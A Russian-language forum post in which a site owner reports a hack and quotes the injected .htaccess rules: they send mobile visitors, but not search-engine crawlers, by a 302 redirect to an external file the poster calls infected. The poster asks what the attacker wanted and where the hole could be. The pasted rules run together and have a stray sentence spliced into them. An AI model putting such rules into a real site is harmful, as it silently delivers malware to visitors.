Поскажите в чем суть вопроса:

Сайт взломали. В htaccess дописали строки (сразу предупрежу - сайт, на который перенаправляют, зараженный). 

RewriteEngine   onRewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeСайт на собственном движке.ker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]RewriteRule    (.*)    http://uxfile.com/odn_agent/u/1783/odn_agent.auto    [L,R=302]


Чего хотел взломщик ? 
Где может быть дыра?

З.Ы. Сайт на собственном движке.